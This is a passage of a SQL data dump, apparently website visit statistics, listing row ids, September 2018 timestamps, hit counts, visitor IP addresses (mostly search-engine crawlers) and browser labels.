,1,0,0,'54.36.148.77','other'),(306818,1537711999,1,1,0,0,'54.36.148.70','other'),(306819,1537712426,1,1,0,0,'54.36.148.59','other'),(306820,1537712649,2,2,0,0,'207.46.13.164','other'),(306821,1537713430,1,1,0,0,'216.244.66.241','other'),(306822,1537713432,1,1,0,0,'54.36.148.180','other'),(306823,1537713927,1,1,0,0,'207.46.13.71','other'),(306824,1537713968,1,1,0,0,'54.36.148.101','other'),(306825,1537714209,8,8,0,0,'178.154.244.29','other'),(306826,1537714337,1,1,0,0,'5.45.207.79','other'),(306827,1537714606,1,1,0,0,'5.45.207.19','other'),(306828,1537714668,1,1,0,0,'8.29.198.25','other'),(306829,1537714962,1,1,0,0,'207.46.13.164','other'),(306830,1537714988,1,1,0,0,'54.36.148.196','other'),(306831,1537715211,1,1,0,0,'178.154.244.29','other'),(306832,1537715304,1,1,0,0,'178.154.244.11','other'),(306833,1537715775,1,1,0,0,'54.36.149.79','other'),(306834,1537716040,1,1,0,0,'207.46.13.164','other'),(306835,1537716192,1,1,0,0,'54.36.149.20','other'),(306836,1537716453,1,1,0,0,'54.36.149.39','other'),(306837,1537716597,1,1,0,0,'54.36.149.14','other'),(306838,1537716685,1,1,0,0,'54.36.149.97','other'),(306839,1537716746,1,1,0,0,'54.36.149.105','other'),(306840,1537716858,1,1,0,0,'180.76.15.142','other'),(306841,1537716946,1,1,0,0,'54.36.148.102','other'),(306842,1537716958,1,1,0,0,'176.193.225.227','chrome'),(306843,1537717101,1,1,0,0,'54.36.149.27','other'),(306844,1537717590,1,1,0,0,'54.36.149.40','other'),(306845,1537717612,1,1,0,0,'54.36.148.98','other'),(306846,1537717644,1,1,0,0,'54.36.149.63','other'),(306847,1537717885,1,1,0,0,'54.36.148.246','other'),(306848,1537718229,1,1,0,0,'54.36.148.131','other'),(306849,1537718380,1,1,0,0,'54.36.148.221','other'),(306850,1537718420,1,1,0,0,'54.36.148.171','other'),(306851,1537718983,1,1,0,0,'35.202.99.105','other'),(306852,1537719052,1,1,0,0,'54.36.149.79','other'),(306853,1537719181,1,1,0,0,'66.249.66.155','chrome'),(306854,1537719587,1,1,0,0,'66.249.66.156','chrome'),(306855,1537719745,1,1,0,0,'54.36.149.41','other'),(306856,1537719849,1,1,0,0,'54.36.148.201','other'),(306857,1537720165,1,1,0,0,'91.196.178.52','chrome'),(306858,1537720867,1,1,0,0,'54.36.148.107','other'),(306859,1537721026,1,1,0,0,'8.29.198.27','other'),(306860,1537721104,1,1,0,0,'54.36.148.102','other'),(306861,1537721161,1,1,0,0,'54.36.149.76','other'),(306862,1537721233,1,1,0,0,'8.29.198.26','other'),(306863,1537721244,1,1,0,0,'66.249.66.57','chrome'),(306864,1537721305,1,0,1,0,'66.249.66.59',''),(306865,1537721488,1,1,0,0,'178.154.244.29','other'),(306866,1537722503,1,1,0,0,'207.46.13.174','other'),(306867,1537722703,1,1,0,0,'216.244.66.241','other'),(306868,1537723519,1,1,0,0,'78.148.81.227','other'),(306869,1537723880,1,1,0,0,'13.66.139.0','other'),(306870,1537724067,2,2,0,0,'91.196.178.57','chrome'),(306871,1537724527,1,1,0,0,'180.76.15.16','other'),(306872,1537725496,1,1,0,0,'8.29.198.26','other'),(306873,1537725510,1,1,0,0,'157.55.39.181','other'),(306874,1537726273,1,0,1,0,'66.249.66.156',''),(306875,1537726538,1,1,0,0,'92.113.189.235','chrome'),(306876,1537726618,1,1,0,0,'54.36.148.217','other'),(306877,1537726961,1,1,0,0,'54.36.149.43','other'),(306878,1537727181,1,1,0,0,'54.36.148.13','other'),(306879,1537727405,1,1,0,0,'54.36.148.250','other'),(306880,1537727836,1,1,0,0,'54.36.148.40','other'),(306881,1537727984,1,1,0,0,'54.36.148.246','other'),(306882,1537728223,1,1,0,0,'54.36.149.83','other'),(306883,1537728491,1,1,0,0,'54.36.148.233','other'),(306884,1537729016,1,1,0,0,'54.36.148.24','other'),(306885,1537729167,1,1,0,0,'216.244.66.241','other'),(306886,1537729256,1,1,0,0,'54.36.149.35','other'),(306887,1537729331,1,1,0,0,'54.36.148.155','other'),(306888,1537729630,1,1,0,0,'54.36.148.38','other'),(306889,1537729828,1,1,0,0,'54.36.148.246','other'),(306890,1537730003,14,14,0,0,'5.9.154.68','other'),(306891,1537730356,1,1,0,0,'54.36.148.104','other'),(306892,1537730373,2,2,0,0,'178.154.244.29','other'),(306893,1537730464,1,1,0,0,'54.36.149.60','other'),(306894,1537730606,3,3,0,0,'158.69.254.103','other'),(306895,1537730829,1,1,0,0,'54.36.149.95','other'),(306896,1537731037,1,1,0,0,'141.8.142.103','other'),(306897,1537731069,1,1,0,0,'54.36.148.30','other'),(306898,1537731258,1,1,0,0,'54.36.148.210','other'),(306899,1537731518,1,1,0,0,'216.244.66.241','other'),(306900,1537731594,1,1,0,0,'54.36.149.4','other'),(306901,1537731652,1,1,0,0,'54.36.148.63','other'),(306902,1537731712,1,1,0,0,'54.36.148.217','other'),(306903,1537731801,1,1,0,0,'54.36.149.39','other'),(306904,1537731846,1,1,0,0,'8.29.198.27','other'),(306905,1537732056,1,1,0,0,'8.29.198.26','other'),(306906,1537732084,1,1,0,0,'54.36.148.20','other'),(306907,1537732096,1,1,0,0,'54.36.149.53','other'),(306908,1537732108,1,1,0,0,'54.36.148.172','other'),(306909,1537732428,1,1,0,0,'66.249.66.157','chrome'),(306910,1537732460,1,1,0,0,'35.202.99.105','other'),(306911,1537732537,1,1,0,0,'178.154.244.29','other'),(306912,1537732541,1,1,0,0,'5.45.207.79','other'),(306913,1537732558,1,1,0,0,'178.154.244.11','other'),(306914,1537732820,1,1,0,0,'54.36.148.226','other'),(306915,1537733256,1,1,0,0,'54.36.148.245','other'),(306916,1537733681,1,1,0,0,'54.36.148.129','other'),(306917,1537733799,1,1,0,0,'54.36.149.106','other'),(306918,1537734093,1,1,0,0,'54.36.149.74','other'),(306919,1537734144,1,1,0,0,'54.36.149.13','other'),(306920,1537734233,2,2,0,0,'216.244.66.241','other'),(306921,1537734500,1,1,0,0,'54.36.148.153','other'),(306922,1537734579,1,1,0,0,'199.47.87.142','other'),(306923,1537734746,1,1,0,0,'54.36.149.99','other'),(306924,1537734870,1,1,0,0,'54.36.148.148','other'),(306925,1537734914,1,1,0,0,'54.36.149.34','other'),(306926,1537735189,1,1,0,0,'54.36.148.189','other'),(306927,1537735338,1,1,0,0,'54.36.149.52','other'),(306928,1537735603,1,1,0,0,'54.36.148.255','other'),(306929,1537735632,1,1,0,0,'54.36.148.172','other'),(306930,1537735639,1,1,0,0,'54.36.149.51','other'),(306931,1537735887,1,1,0,0,'54.36.148.101','other'),(306932,1537735939,1,1,0,0,'54.36.148.54','other'),(306933,1537735981,1,1,0,0,'54.36.148.165','other'),(306934,1537736330,1,1,0,0,'8.29.198.27','other'),(306935,1537736503,1,1,0,0,'54.36.148.73','other'),(306936,1537736774,1,1,0,0,'207.46.13.164','other'),(306937,1537736852,1,1,0,0,'54.36.148.66','other'),(306938,1537736875,1,1,0,0,'54.36.149.24','other'),(306939,1537736882,1,1,0,0,'54.36.148.238','other'),(306940,1537736928,1,1,0,0,'54.36.148.51','other'),(306941,1537737230,1,1,0,0,'54.36.148.101','other'),(306942,1537737498,1,1,0,0,'54.36.148.255','other'),(306943,1537737648,1,1,0,0,'54.36.148.33','other'),(306944,1537738048,1,1,0,0,'66.249.66.157','chrome'),(306945,1537738266,1,1,0,0,'54.36.148.144','other'),(306946,1537738713,1,1,0,0,'54.36.148.191','other'),(306947,1537738804,1,1,0,0,'66.249.66.155','chrome'),(306948,1537739232,1,1,0,0,'54.36.148.238','other'),(306949,1537739244,6,6,0,0,'178.154.244.29','other'),(306950,1537739250,1,1,0,0,'37.54.114.62','chrome'),(306951,1537739267,1,1,0,0,'54.36.148.231','other'),(306952,1537739546,1,1,0,0,'178.154.244.11','other'),(306953,1537739783,2,2,0,0,'87.250.224.47','other'),(306954,1537739912,1,1,0,0,'54.36.149.13','other'),(306955,1537740241,1,1,0,0,'54.36.148.203','other'),(306956,1537740261,1,1,0,0,'54.36.148.66','other'),(306957,1537740561,1,1,0,0,'207.46.13.164','other'),(306958,1537740641,1,1,0,0,'54.36.148.61','other'),(306959,1537740858,1,1,0,0,'54.36.149.12','other'),(306960,1537740874,1,1,0,0,'54.36.148.30','other'),(306961,1537740913,1,1,0,0,'54.36.148.173','other'),(306962,1537741056,2,2,0,0,'216.244.66.241','other'),(306963,1537741479,1,1,0,0,'54.36.148.115','other'),(306964,1537741484,1,1,0,0,'54.36.149.86','other'),(306965,1537742020,1,1,0,0,'216.244.66.241','other'),(306966,1537742097,1,1,0,0,'54.36.148.205','other'),(306967,1537742297,1,1,0,0,'54.36.148.157','other'),(306968,1537742631,1,1,0,0,'54.36.149.105','other'),(306969,1537742639,1,1,0,0,'207.46.13.174','other'),(306970,1537742661,1,1,0,0,'173.208.157.186','other'),(306971,1537742667,1,1,0,0,'8.29.198.25','other'),(306972,1537742766,1,1,0,0,'54.36.149.11','other'),(306973,1537742885,1,1,0,0,'8.29.198.27','other'),(306974,1537742918,1,1,0,0,'207.46.13.71','other'),(306975,1537743358,1,1,0,0,'54.36.148.99','other'),(306976,1537744718,1,1,0,0,'54.36.148.223','other'),(306977,1537744834,1,1,0,0,'54.36.148.74','other'),(306978,1537744867,1,1,0,0,'54.36.149.64','other'),(306979,1537744916,1,1,0,0,'54.36.148.105','other'),(306980,1537745008,1,1,0,0,'180.76.15.158','other'),(306981,1537745678,1,1,0,0,'207.46.13.71','other'),(306982,1537745799,1,1,0,0,'54.36.148.176','other'),(306983,1537745952,1,1,0,0,'54.36.149.25','other'),(306984,1537745997,1,1,0,0,'54.36.148.238','other'),(306985,1537746356,1,1,0,0,'54.36.148.255','other'),(306986,1537746461,1,1,0,0,'54.36.149.105','other'),(306987,1537746562,1,1,0,0,'54.36.149.21','other'),(306988,1537747025,1,1,0,0,'54.36.149.103','other'),(306989,1537747164,1,1,0,0,'8.29.198.27','other'),(306990,1537747243,1,1,0,0,'54.36.149.64','other'),(306991,1537747329,1,1,0,0,'54.36.148.189','other'),(306992,1537747399,1,1,0,0,'54.36.148.213','other'),(306993,1537747702,1,1,0,0,'35.202.99.105','other'),(306994,1537747939,1,1,0,0,'54.36.148.24','other'),(306995,1537748132,1,1,0,0,'54.36.148.75','other'),(306996,1537748692,1,1,0,0,'54.36.149.53','other'),(306997,1537749130,1,1,0,0,'207.46.13.174','other'),(306998,1537749243,1,1,0,0,'54.36.148.92','other'),(306999,1537749502,1,1,0,0,'54.36.148.42','other'),(307000,1537749525,1,1,0,0,'216.244.66.241','other'),(307001,1537750392,1,1,0,0,'54.36.148.202','other'),(307002,1537750842,1,1,0,0,'207.46.13.164','other'),(307003,1537750921,1,1,0,0,'54.36.148.65','other'),(307004,1537751404,1,1,0,0,'54.36.148.22','other'),(307005,1537751435,1,1,0,0,'54.36.148.145','other'),(307006,1537751555,1,1,0,0,'54.36.148.186','other'),(307007,1537751679,1,1,0,0,'54.36.148.207','other'),(307008,1537751878,1,1,0,0,'54.36.149.43','other'),(307009,1537752263,1,1,0,0,'54.36.149.9','other'),(307010,1537752312,1,1,0,0,'54.36.148.134','other'),(307011,1537752370,1,1,0,0,'54.36.148.133','other'),(307012,1537753099,1,1,0,0,'54.36.149.60','other'),(307013,1537753128,1,1,0,0,'54.36.149.84','other'),(307014,1537753408,1,1,0,0,'207.46.13.71','other'),(307015,1537753489,1,1,0,0,'8.29.198.27','other'),(307016,1537753503,1,1,0,0,'54.36.148.53','other'),(307017,1537753581,1,1,0,0,'216.244.66.241','other'),(307018,1537753724,1,1,0,0,'8.29.198.26','other'),(307019,1537753959,1,1,0,0,'54.36.148.122','other'),(307020,1537754591,1,1,0,0,'54.36.148.247','other'),(307021,1537754641,1,1,0,0,'216.244.66.241','other'),(307022,1537755060,1,1,0,0,'54.36.148.27','other'),(307023,1537755081,1,1,0,0,'54.36.148.123','other'),(307024,1537755386,1,1,0,0,'207.46.13.71','other'),(307025,1537755576,1,1,0,0,'54.36.148.21','other'),(307026,1537755662,1,1,0,0,'54.36.148.210','other'),(307027,1537755869,1,1,0,0,'54.36.148.225','other'),(307028,1537755921,1,1,0,0,'54.36.148.158','other'),(307029,1537756035,1,1,0,0,'54.36.148.188','other'),(307030,1537756080,1,1,0,0,'54.36.149.37','other'),(307031,1537756247,1,1,0,0,'54.36.148.249','other'),(307032,1537756260,1,1,0,0,'54.36.148.91','other'),(307033,1537756338,1,1,0,0,'54.36.149.34','other'),(307034,1537756558,1,1,0,0,'54.36.148.234','other'),(307035,1537756570,1,1,0,0,'66.249.66.156','chrome'),(307036,1537756628,1,1,0,0,'52.37.211.217','chrome'),(307037,1537756632,1,1,0,0,'54.36.148.17','other'),(307038,1537756768,2,2,0,0,'178.154.244.29','other'),(307039,1537756872,1,1,0,0,'54.36.148.78','other'),(307040,1537756938,1,1,0,0,'54.36.148.57','other'),(307041,1537756940,1,1,0,0,'54.36.148.152','other'),(307042,1537757211,1,1,0,0,'54.36.149.7','other'),(307043,1537757272,3,3,0,0,'5.45.207.79','other'),(307044,1537757276,1,1,0,0,'178.154.244.11','other'),(307045,1537757288,1,1,0,0,'54.36.148.153','other'),(307046,1537757426,1,1,0,0,'54.36.148.161','other'),(307047,1537757611,1,1,0,0,'157.55.39.181','other'),(307048,1537757696,1,1,0,0,'35.162.70.167','chrome'),(307049,1537757993,1,1,0,0,'8.29.198.26','other'),(307050,1537758329,1,1,0,0,'54.36.148.16','other'),(307051,1537758662,1,1,0,0,'54.36.149.2','other'),(307052,1537759392,1,1,0,0,'54.36.149.52','other'),(307053,1537759749,26,26,0,0,'173.208.200.154','other'),(307054,1537759795,1,1,0,0,'54.36.149.76','other'),(307055,1537759823,1,1,0,0,'54.36.148.89','other'),(307056,1537759867,1,1,0,0,'54.36.149.98','other'),(307057,1537760061,1,1,0,0,'207.46.13.174','other'),(307058,1537760142,1,1,0,0,'54.36.148.111','other'),(307059,1537760314,1,1,0,0,'54.36.148.22','other'),(307060,1537760897,1,1,0,0,'54.36.148.63','other'),(307061,1537761025,1,1,0,0,'54.36.148.235','other'),(307062,1537761706,1,1,0,0,'54.36.148.245','other'),(307063,1537761738,9,9,0,0,'192.151.145.178','other'),(307064,1537761905,1,1,0,0,'66.249.66.61','chrome'),(307065,1537762003,1,1,0,0,'54.36.148.219','other'),(307066,1537762206,1,1,0,0,'54.36.148.106','other'),(307067,1537762739,1,1,0,0,'54.36.148.73','other'),(307068,1537762859,1,1,0,0,'54.36.148.141','other'),(307069,1537762954,1,1,0,0,'90.188.255.142','chrome'),(307070,1537763551,2,2,0,0,'54.36.148.162','other'),(307071,1537764068,1,1,0,0,'54.36.148.65','other'),(307072,1537764318,1,1,0,0,'8.29.198.26','other'),(307073,1537764359,1,1,0,0,'54.36.148.102','other'),(307074,1537764554,1,1,0,0,'8.29.198.25','other'),(307075,1537764626,1,1,0,0,'54.36.148.238','other'),(307076,1537764808,1,1,0,0,'54.36.148.11','other'),(307077,1537765219,1,1,0,0,'54.36.149.71','other'),(307078,1537765337,1,1,0,0,'54.36.148.61','other'),(307079,1537765526,1,1,0,0,'54.36.148.69','other'),(307080,1537766048,1,1,0,0,'213.180.203.9','other'),(307081,1537766232,1,1,0,0,'207.46.13.164','other'),(307082,1537766985,1,1,0,0,'54.36.149.3','other'),(307083,1537767128,1,1,0,0,'178.154.171.69','other'),(307084,1537767191,2,2,0,0,'141.8.142.108','other'),(307085,1537767199,1,1,0,0,'95.108.181.83','other'),(307086,1537767225,2,2,0,0,'87.250.224.99','other'),(307087,1537767387,2,2,0,0,'95.108.181.57','other'),(307088,1537767428,1,1,0,0,'141.8.142.162','other'),(307089,1537767497,1,1,0,0,'93.158.166.7','other'),(307090,1537767601,1,1,0,0,'141.8.142.38','other'),(307091,1537767643,1,1,0,0,'213.180.203.23','other'),(307092,1537767696,2,2,0,0,'37.9.113.148','other'),(307093,1537767874,1,1,0,0,'54.36.148.101','other'),(307094,1537767898,1,1,0,0,'213.180.203.9','other'),(307095,1537767921,1,1,0,0,'178.154.171.17','other'),(307096,1537767997,2,2,0,0,'213.180.203.61','other'),(307097,1537768006,1,1,0,0,'194.146.191.195','chrome'),(307098,1537768064,1,1,0,0,'141.8.183.23','other'),(307099,1537768137,1,1,0,0,'54.36.149.69','other'),(307100,1537768178,2,2,0,0,'5.255.253.22','other'),(307101,1537768220,1,1,0,0,'54.36.148.50','other'),(307102,1537768251,1,1,0,0,'93.78.212.202','firefox'),(307103,1537768405,1,1,0,0,'141.8.142.162','other'),(307104,1537768431,1,1,0,0,'66.249.66.156','chrome'),(307105,1537768456,1,1,0,0,'141.8.183.11','other'),(307106,1537768545,1,1,0,0,'87.250.224.65','other'),(307107,1537768639,2,2,0,0,'141.8.142.38','other'),(307108,1537768702,16,16,0,0,'198.204.244.90','other'),(307109,1537768707,1,1,0,0,'54.36.149.0','other'),(307110,1537768785,1,1,0,0,'158.69.252.176','other'),(307111,1537768810,1,1,0,0,'91.196.179.138','chrome'),(307112,1537768824,1,1,0,0,'8.29.198.27','other'),(307113,1537768831,1,1,0,0,'95.108.181.54','other'),(307114,1537768899,1,1,0,0,'213.180.203.40','other'),(307115,1537768985,1,1,0,0,'178.154.171.30','other'),(307116,1537769019,1,1,0,0,'213.180.203.23','other'),(307117,1537769081,2,2,0,0,'141.8.142.108','other'),(307118,1537769113,1,1,0,0,'178.154.200.8','other'),(307119,1537769230,1,1,0,0,'54.36.148.175','other'),(307120,1537769628,1,1,0,0,'95.108.181.83','other'),(307121,1537769783,1,1,0,0,'141.8.142.162','other'),(307122,1537770078,4,4,0,0,'87.250.224.64','other'),(307123,1537770147,1,1,0,0,'178.154.171.69','other'),(307124,1537770163,1,1,0,0,'5.255.253.22','other'),(307125,1537770247,1,1,0,0,'54.36.148.31','other'),(307126,1537770280,1,1,0,0,'141.8.142.65','other'),(307127,1537770331,1,1,0,0,'5.45.207.76','other'),(307128,1537770382,1,1,0,0,'213.180.203.9','other'),(307129,1537770495,1,1,0,0,'178.154.171.30','other'),(307130,1537770499,1,1,0,0,'213.180.203.61','other'),(307131,1537770510,5,5,0,0,'37.53.96.185','chrome'),(307132,1537770596,1,1,0,0,'54.36.148.209','other'),(307133,1537770729,1,1,0,0,'178.154.171.17','other'),(307134,1537770776,1,1,0,0,'54.36.149.19','other'),(307135,1537770798,1,1,0,0,'54.36.148.232','other'),(307136,1537770800,1,1,0,0,'213.180.203.23','other'),(307137,1537770911,1,1,0,0,'178.154.244.21','other'),(307138,1537770935,1,1,0,0,'95.108.181.54','other'),(307139,1537771029,1,1,0,0,'54.36.149.22','other'),(307140,1537771057,1,1,0,0,'141.8.142.38','other'),(307141,1537771116,1,1,0,0,'54.36.148.170','other'),(307142,1537771257,1,1,0,0,'178.154.244.29','other'),(307143,1537771273,2,2,0,0,'95.213.141.126','opera'),(307144,1537771299,3,3,0,0,'178.154.244.11','other'),(307145,1537771355,1,1,0,0,'54.36.148.206','other'),(307146,1537771629,1,1,0,0,'54.36.149.54','other'),(307147,1537771735,1,1,0,0,'54.36.148.178','other'),(307148,1537772421,1,1,0,0,'54.36.148.96','other'),(307149,1537772612,1,1,0,0,'178.154.244.11','other'),(307150,1537772872,1,1,0,0,'54.36.148.25','other'),(307151,1537772900,1,1,0,0,'54.36.149.78','other'),(307152,1537773177,1,1,0,0,'54.36.149.91','other'),(307153,1537773213,1,1,0,0,'46.211.153.183','chrome'),(307154,1537773220,1,1,0,0,'54.36.148.109','other'),(307155,1537773811,1,1,0,0,'54.36.148.122','other'),(307156,1537774084,1,1,0,0,'54.36.149.99','other'),(307157,1537774742,1,1,0,0,'54.36.149.66','other'),(307158,1537775148,2,2,0,0,'8.29.198.25','other'),(307159,1537775208,1,1,0,0,'54.36.148.234','other'),(307160,1537775220,1,1,0,0,'216.244.66.241','other'),(307161,1537775834,1,1,0,0,'54.36.148.225','other'),(307162,1537775908,1,1,0,0,'54.36.149.5','other'),(307163,1537775922,1,1,0,0,'54.36.148.15','other'),(307164,1537775986,1,1,0,0,'54.36.148.19','other'),(307165,1537776440,1,1,0,0,'54.36.148.162','other'),(307166,1537776584,1,1,0,0,'54.36.148.228','other'),(307167,1537776720,1,1,0,0,'54.36.148.106','other'),(307168,1537777341,1,1,0,0,'54.36.148.170','other'),(307169,1537777378,1,1,0,0,'54.36.148.77','other'),(307170,1537777441,1,1,0,0,'80.252.154.233','chrome'),(307171,1537777520,2,2,0,0,'178.154.244.29','other'),(307172,1537777662,1,1,0,0,'216.244.66.241','other'),(307173,1537777684,1,1,0,0,'54.36.148.250','other'),(307174,1537777723,1,1,0,0,'54.36.148.108','other'),(307175,1537777819,1,1,0,0,'54.36.149.21','other'),(307176,1537777971,2,2,0,0,'185.4.66.20','firefox'),(307177,1537778162,2,2,0,0,'91.209.214.11','chrome'),(307178,1537778745,1,1,0,0,'91.196.178.171','chrome'),(307179,1537778900,1,1,0,0,'54.36.148.223','other'),(307180,1537778921,1,1,0,0,'54.36.148.10','other'),(307181,1537778975,1,1,0,0,'54.36.148.61','other'),(307182,1537779138,1,1,0,0,'178.154.244.11','other'),(307183,1537779140,1,1,0,0,'178.95.34.183','chrome'),(307184,1537779454,1,1,0,0,'54.36.148.211','other'),(307185,1537779647,1,1,0,0,'8.29.198.27','other'),(307186,1537779720,1,1,0,0,'66.249.66.57','chrome'),(307187,1537779724,1,1,0,0,'54.36.148.195','other'),(307188,1537779806,1,1,0,0,'54.36.148.142','other'),(307189,1537779943,1,1,0,0,'54.36.149.100','other'),(307190,1537780056,1,1,0,0,'54.36.148.83','other'),(307191,1537780146,1,1,0,0,'54.36.148.76','other'),(307192,1537780157,1,1,0,0,'207.46.13.71','other'),(307193,1537780188,1,1,0,0,'54.36.148.87','other'),(307194,1537780487,1,1,0,0,'178.154.244.29','other'),(307195,1537780680,1,1,0,0,'178.154.244.11','other'),(307196,1537780790,1,1,0,0,'130.180.210.34','chrome'),(307197,1537780925,1,1,0,0,'54.36.148.131','other'),(307198,1537781188,1,1,0,0,'54.36.148.16','other'),(307199,1537781892,1,1,0,0,'178.154.244.29','other'),(307200,1537781948,1,1,0,0,'54.36.148.179','other'),(307201,1537782071,1,1,0,0,'54.36.148.108','other'),(307202,1537782430,1,1,0,0,'54.36.149.22','other'),(307203,1537782713,1,1,0,0,'54.36.148.19','other'),(307204,1537782764,1,1,0,0,'91.196.178.35','chrome'),(307205,1537782783,1,1,0,0,'216.244.66.241','other'),(307206,1537782801,1,0,1,0,'66.249.66.157',''),(307207,1537782999,2,2,0,0,'178.154.244.29','other'),(307208,1537783147,1,1,0,0,'91.196.178.169','firefox'),(307209,1537783802,2,2,0,0,'184.94.240.92','firefox'),(307210,1537783858,1,1,0,0,'91.196.179.138','chrome'),(307211,1537783932,1,1,0,0,'107.167.105.139','chrome'),(307212,1537784028,1,1,0,0,'54.36.149.57','other'),(307213,1537784038,1,1,0,0,'54.36.149.13','other'),(307214,1537784580,1,1,0,0,'54.36.149.86','other'),(307215,1537785106,1,1,0,0,'54.36.149.75','other'),(307216,1537785170,1,1,0,0,'54.36.149.67','other'),(307217,1537785205,1,1,0,0,'54.36.148.232','other'),(307218,1537785435,2,2,0,0,'54.165.59.7','other'),(307219,1537785981,1,1,0,0,'8.29.198.25','other'),(307220,1537786079,1,1,0,0,'54.36.148.83','other'),(307221,1537786205,1,1,0,0,'8.29.198.26','other'),(307222,1537786305,1,1,0,0,'111.202.101.108','other'),(307223,1537786494,1,1,0,0,'54.36.148.133','other'),(307224,1537786662,1,1,0,0,'54.36.148.213','other'),(307225,1537786785,1,1,0,0,'216.244.66.241','other'),(307226,1537787376,1,1,0,0,'54.36.148.64','other'),(307227,1537787474,1,1,0,0,'184.94.240.92','firefox'),(307228,1537787824,2,2,0,0,'54.165.59.7','other'),(307229,1537787946,1,1,0,0,'54.36.148.132','other'),(307230,1537788120,1,1,0,0,'54.36.148.192','other'),(307231,1537788367,1,1,0,0,'54.36.149.95','other'),(307232,1537788659,1,1,0,0,'54.36.148.54','other'),(307233,1537788682,1,1,0,0,'54.36.148.144','other'),(307234,1537789091,1,1,0,0,'91.196.178.65','chrome'),(307235,1537789356,1,1,0,0,'54.36.148.152','other'),(307236,1537789451,1,1,0,0,'54.36.149.60','other'),(307237,1537789548,1,1,0,0,'54.36.149.30','other'),(307238,1537789826,1,1,0,0,'54.36.149.33','other'),(307239,1537790053,1,1,0,0,'54.36.148.165','other'),(307240,1537790380,1,1,0,0,'54.36.148.172','other'),(307241,1537790426,2,2,0,0,'216.244.66.241','other'),(307242,1537790466,1,1,0,0,'8.29.198.27','other'),(307243,1537791263,1,1,0,0,'54.36.148.241','other'),(307244,1537791306,1,1,0,0,'54.36.149.15','other'),(307245,1537791389,1,1,0,0,'54.36.149.106','other'),(307246,1537791601,1,1,0,0,'54.36.148.137','other'),(307247,1537792437,1,1,0,0,'54.36.149.4','other'),(307248,1537792492,1,1,0,0,'95.163.255.106','other'),(307249,1537792497,1,1,0,0,'95.163.255.104','other'),(307250,1537792502,1,1,0,0,'95.163.255.105','other'),(307251,1537792507,1,1,0,0,'95.163.255.116','other'),(307252,1537792513,1,1,0,0,'35.202.99.105','other'),(307253,1537792673,1,1,0,0,'54.36.148.158','other'),(307254,1537792761,1,1,0,0,'54.36.148.106','other'),(307255,1537792916,1,1,0,0,'82.145.209.107','other'),(307256,1537793129,1,1,0,0,'176.193.225.227','chrome'),(307257,1537793727,1,1,0,0,'130.180.216.104','chrome'),(307258,1537793912,1,1,0,0,'54.36.148.231','other'),(307259,1537794147,1,1,0,0,'95.132.61.116','firefox'),(307260,1537794555,1,1,0,0,'54.36.149.53','other'),(307261,1537794564,1,1,0,0,'54.36.149.22','other'),(307262,1537794759,1,1,0,0,'54.36.148.170','other'),(307263,1537794905,1,1,0,0,'54.36.148.50','other'),(307264,1537795058,1,1,0,0,'54.36.148.74','other'),(307265,1537795071,1,1,0,0,'3.120.147.193','other'),(307266,1537795154,2,2,0,0,'91.209.11.236','other'),(307267,1537795192,1,1,0,0,'54.36.148.106','other'),(307268,1537795212,1,1,0,0,'54.36.148.140','other'),(307269,1537795404,1,1,0,0,'54.36.148.19','other'),(307270,1537795814,1,1,0,0,'54.36.148.38','other'),(307271,1537795857,1,1,0,0,'93.78.212.202','msie'),(307272,1537796213,1,1,0,0,'54.36.148.221','other'),(307273,1537796219,1,1,0,0,'54.36.148.24','other'),(307274,1537796260,1,1,0,0,'54.36.148.97','other'),(307275,1537796512,1,1,0,0,'216.244.66.241','other'),(307276,1537796672,1,1,0,0,'91.209.11.236','other'),(307277,1537796813,1,1,0,0,'8.29.198.27','other'),(307278,1537796955,1,1,0,0,'54.36.148.231','other'),(307279,1537796981,1,1,0,0,'46.242.118.194','chrome'),(307280,1537797018,1,1,0,0,'54.36.149.1','other'),(307281,1537797029,1,1,0,0,'8.29.198.26','other'),(307282,1537797564,1,1,0,0,'54.36.149.23','other'),(307283,1537797625,1,1,0,0,'95.132.34.27','chrome'),(307284,1537797679,1,1,0,0,'91.196.178.169','chrome'),(307285,1537797762,1,1,0,0,'66.249.66.157','chrome'),(307286,1537797915,1,1,0,0,'91.196.178.171','chrome'),(307287,1537797968,1,1,0,0,'54.36.148.226','other'),(307288,1537798090,1,1,0,0,'66.249.66.155','chrome'),(307289,1537798193,1,1,0,0,'54.36.148.38','other'),(307290,1537798448,1,1,0,0,'54.36.148.125','other'),(307291,1537798469,1,1,0,0,'54.36.149.39','other'),(307292,1537798642,1,1,0,0,'54.36.148.138','other'),(307293,1537799292,1,1,0,0,'66.249.66.156','chrome'),(307294,1537799512,1,1,0,0,'66.249.66.59','chrome'),(307295,1537799770,1,1,0,0,'66.249.66.157','chrome'),(307296,1537800484,1,1,0,0,'54.36.148.174','other'),(307297,1537800687,1,1,0,0,'87.250.224.46','other'),(307298,1537800723,1,1,0,0,'5.45.207.79','other'),(307299,1537800729,1,1,0,0,'141.8.142.103','other'),(307300,1537800741,1,1,0,0,'5.45.207.19','other'),(307301,1537801055,3,3,0,0,'178.154.244.29','other'),(307302,1537801295,1,1,0,0,'8.29.198.26','other'),(307303,1537801455,1,1,0,0,'91.196.178.68','chrome'),(307304,1537801537,2,2,0,0,'216.244.66.241','other'),(307305,1537801672,1,1,0,0,'213.180.203.61','other'),(307306,1537801695,1,1,0,0,'37.9.113.103','other'),(307307,1537801705,2,2,0,0,'5.45.207.79','other'),(307308,1537801716,1,1,0,0,'5.45.207.19','other'),(307309,1537801745,1,1,0,0,'5.9.77.102','other'),(307310,1537801965,12,12,0,0,'178.154.244.29','other'),(307311,1537801984,1,1,0,0,'54.36.148.95','other'),(307312,1537802092,1,1,0,0,'178.154.244.11','other'),(307313,1537802215,1,1,0,0,'87.250.224.65','other'),(307314,1537802396,1,1,0,0,'141.8.142.108','other'),(307315,1537802417,1,1,0,0,'37.9.113.148','other'),(307316,1537802423,1,1,0,0,'213.180.203.9','other'),(307317,1537802834,1,1,0,0,'141.8.142.103','other'),(307318,1537802924,1,1,0,0,'54.36.148.110','other'),(307319,1537803004,1,1,0,0,'62.205.134.182','other'),(307320,1537803005,3,3,0,0,'178.154.244.11','other'),(307321,1537803019,1,1,0,0,'54.36.148.56','other'),(307322,1537803046,1,1,0,0,'54.36.149.14','other'),(307323,1537803168,1,1,0,0,'54.36.149.54','other'),(307324,1537803170,5,5,0,0,'178.154.244.29','other'),(307325,1537803197,2,2,0,0,'5.45.207.19','other'),(307326,1537803282,1,1,0,0,'212.1.78.181','chrome'),(307327,1537804150,3,3,0,0,'178.154.244.29','other'),(307328,1537804151,1,1,0,0,'54.36.148.81','other'),(307329,1537804201,1,1,0,0,'178.154.244.11','other'),(307330,1537804240,1,1,0,0,'5.255.253.16','other'),(307331,153